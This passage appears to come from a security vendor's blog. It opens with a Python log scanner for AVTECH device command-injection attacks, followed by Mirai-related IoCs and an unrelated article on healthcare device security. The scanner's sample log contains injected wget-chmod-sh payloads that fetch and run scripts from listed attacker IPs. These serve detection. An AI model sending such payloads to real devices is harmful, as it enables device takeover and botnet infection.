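from urllib.parse import urlsplit, parse_qs, unquote

# IP indicators of compromise listed in this post.
IOC_IPS = {
    "185.172.110.205", "185.172.110.241", "185.172.111.196",
    "185.172.111.202", "45.95.168.98",
}

# Combined-log request line: client, timestamp, "METHOD URI PROTO", status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that have no business in a legitimate CGI parameter value.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# Host of a wget/curl fetch: either a URL with a scheme or a bare IPv4 address.
FETCH_HOST = re.compile(
    r"\b(?:wget|curl)\b[^;|&]*?"
    r"(?:(?:https?|ftp)://([A-Za-z0-9.-]+)|\b(\d{1,3}(?:\.\d{1,3}){3}))"
)
# Execution of the dropped script after a command separator.
EXEC_RE = re.compile(r"(?:^|[;|&])\s*(?:sh|bash)\s+\S+|\./\S+")

# Constructed sample log (hypothetical directory prefixes, parameter names and payloads).
SAMPLE_LOG = """\
10.0.0.7 - - [12/Sep/2020:10:01:02 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=192.168.1.50&port=80 HTTP/1.1" 200 512
203.0.113.5 - - [12/Sep/2020:10:01:09 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=1.1.1.1%3Bwget%20http%3A%2F%2F185.172.110.205%2Fx.sh%3Bchmod%20777%20x.sh%3Bsh%20x.sh&port=80 HTTP/1.1" 200 0
203.0.113.6 - - [12/Sep/2020:10:02:31 +0000] "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%2045.95.168.98%2Fb.sh%20-O%20%2Ftmp%2Fb.sh%3Bsh%20%2Ftmp%2Fb.sh HTTP/1.1" 401 0
198.51.100.9 - - [12/Sep/2020:10:03:05 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=127.0.0.1%253Bwget%2520http%253A%252F%252Fexample.net%252Fa.sh HTTP/1.1" 200 0
"""


def analyze_line(line):
    """Return a finding dict for an AVTECH command-injection attempt, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    # parse_qs decodes one layer; decode again so %253B (-> %3B -> ;) is caught.
    params = {k: [unquote(v) for v in vals]
              for k, vals in parse_qs(parts.query, keep_blank_values=True).items()}
    script = parts.path.rsplit("/", 1)[-1]
    rule = param = payload = None
    if script == "Search.cgi" and params.get("action") == ["cgi_query"]:
        # Unauthenticated path: any parameter reaching the wget command line is a sink.
        for k, vals in params.items():
            hit = next((v for v in vals if SHELL_META.search(v)), None)
            if hit is not None:
                rule, param, payload = "avtech-search-cgi-unauth-cmdinj", k, hit
                break
    elif script == "CloudSetup.cgi" and "exefile" in params:
        # exefile names the command to run, so any value is an execution attempt.
        rule, param, payload = "avtech-cloudsetup-cgi-auth-cmdinj", "exefile", params["exefile"][0]
    if rule is None:
        return None
    hosts = [g1 or g2 for g1, g2 in FETCH_HOST.findall(payload)]
    return {
        "src": m.group("src"),
        "status": int(m.group("status")),   # 200 on CloudSetup.cgi means auth succeeded
        "script": script,
        "rule": rule,
        "param": param,
        "payload": payload,
        "download_hosts": hosts,
        "ioc_match": sorted(set(hosts) & IOC_IPS),
        "stages": {
            "download": bool(hosts),
            "chmod": "chmod" in payload,
            "execute": bool(EXEC_RE.search(payload)),
        },
    }


def scan(log_text):
    """Run analyze_line over every line of an access log and collect the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['src']} -> {f['script']} [{f['rule']}] HTTP {f['status']} "
              f"param={f['param']} hosts={f['download_hosts']} "
              f"ioc={f['ioc_match']} stages={f['stages']}")
```

The HTTP status is worth keeping next to the CloudSetup.cgi finding: because that endpoint requires authentication, a 401 is a failed attempt, while a 200 means the attacker already had working credentials and the device should be treated as compromised. Hosts that are not in the IoC list are still reported, since the download-and-execute chain is the behaviour to alert on even when the infrastructure changes.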

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 14697:AVTECH Devices Command Injection
  • IPS 13035:AVTECH Devices Remote Command Execution
  • GAV:Mirai.H
  • GAV:Mirai.H_2
  • GAV:MiraiA.N
  • GAV:MiraiA.N_2

Threat Graph

IoCs:

IP addresses:
  • 185.172.110.205
  • 185.172.110.241
  • 185.172.111.196
  • 185.172.111.202
  • 45.95.168.98

File hashes (MD5):
  • dcdeae98d9ab0fa3005ec36b1f55bb5b
  • 99d3ce410735ba5e7008198aae3a6e39
  • 4dcfa2daeb85d89da784e5e1928062de
  • 148a1941582372ce22eacf86b5c7f852


Securing Internet-Connected Devices in Healthcare

This article is based on an interview with SonicWall PreSales Engineer Barbara Vibbert, who spent 10 years in healthcare IT and more than 20 years in information security.

From the carts that roll from room to room checking vital signs to the tablet at the check-in desk, internet-connected devices can be seen during every hospital visit. What isn’t visible, however, is the massive infrastructure required to connect and secure them.

While these connected devices have brought countless benefits to healthcare, they also have the potential to endanger patient privacy, data integrity and even the continued survival of the hospitals themselves.

Access control in healthcare environments

Most doctors are not employed by the hospital where they work. Nor are many of the people in charge of maintaining equipment. These individuals have their own laptops, tablets and other devices that IT has no control over, but they require network access in order to do the jobs that keep the hospital running.

Hospitals’ vast access control teams are also needed to regularly onboard large numbers of people at once. In most IT departments, users are onboarded and offboarded throughout the year as employees come and go. In hospitals, however, a large influx of new users must be added each year around July 1, when hospital residencies begin. There can be hundreds of new residents and fellows per year that require onboarding, but hospitals generally only have a five-day window to get them up and running.

An equally sizeable, but completely unpredictable, wave of new users must be onboarded during nursing strikes. Depending on the size of the nursing staff, IT may have to quickly add several hundred new visiting nurses to the network with little warning.

Even within the hospital, data must be accessible for purposes not directly tied to patient care; for example, research and billing. But greater accessibility always brings with it greater risk. In May, an Ohio medical center posted an Excel spreadsheet on its website to comply with new requirements about cost transparency. However, inadvertently included in the spreadsheet were the names, diagnoses, treatment histories and other information of nearly 4,000 patients — a major violation of patient confidentiality laws.

Teleworking in healthcare environments

The online services that hospitals use also have patient privacy implications — and with many healthcare workers now working from home, this is a bigger concern than ever. For example, many hospitals don’t host their own telemedicine, relying instead on Zoom-like platforms … or Zoom itself. Because these sorts of platforms weren’t designed to comply with the heightened privacy regulations governing the healthcare industry, they can present a privacy risk.

The danger here isn’t limited to online interlopers, however. With employees no longer afforded the seclusion of their offices, a number of low-tech privacy risks emerge. For example, if a medical professional is doing a psychiatric consultation from home, a spouse, roommate or even a passer-by could potentially see and hear what’s being discussed through an open door or window.

IoT Devices in healthcare environments

Human-operated devices aren’t the only ones that need safeguarding. Hospitals use countless Internet of Things (IoT) devices, responsible for everything from monitoring patient heart rates, to regulating sleep apnea, to ensuring new parents don’t accidentally leave the hospital with the wrong baby.

You don’t need to worry about cybercriminals hacking into your blood pressure cuff or pulse oximeter, however — these devices are on a separate network that is highly secured and largely inaccessible.

This is largely due to the widespread inability to update and patch these devices. FDA approval is required for any device that comes into contact with a patient. But that approval only extends to the device’s state at the time of approval.

In other words, patching, updating or otherwise altering these devices nullifies the approval. To get around this security hurdle, hospitals make extensive use of firewalls: Without them, having a device on the network that can make the difference between life and death, but can also contain unpatchable vulnerabilities, would simply be too big a liability.

… Plus All the Usual Suspects

If that wasn’t enough, hospitals still have to contend with the standard IT hazards, such as phishing, ransomware and remote work risks. Hospital IT should be the last line of defense against phishing — busy doctors and nurses can’t be expected to investigate the legitimacy of emails when every second spent doing so is one less spent on patient care.

But given the massive uptick in attacks targeting hospitals, the number of phishing emails that get through and successfully fool employees is on the rise. According to Healthcare Finance, during a recent study employees clicked on roughly 1 in 7 simulated phishing emails, putting hospitals at risk for threats such as credential theft and ransomware.

And ransomware has the potential to be especially devastating for hospitals. Taking the billing department offline for a week can put any hospital in a tight spot, or in the case of smaller hospitals, even drive them to bankruptcy. And without the ability to collect or access patient data, facilities have to turn patients away — which can be deadly.

How hospitals, healthcare organizations can improve security hygiene

While more devices necessarily means more risk, these risks can be mitigated. One way is through network segmentation. By isolating different parts of the care practice, hospitals could reduce the potential destructiveness of cyberthreats. And with fewer people able to access each piece of patient data, privacy risks would be reduced as well.

There are also several steps individuals can take:

  • Keep devices patched and up to date. This is a good habit in general, but it’s crucial when accessing hospital networks from home.
  • Deploy a firewall for your home network. (Even the one built into Windows offers some protection.)
  • Use next-generation antimalware protection. Today’s advanced threats can bypass traditional signature-based antivirus software.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations in every industry protect against the threats of today and prepare for the threats of tomorrow. To learn more, check back next week as we explore what future threats could look like, and how we as individuals can help prevent them.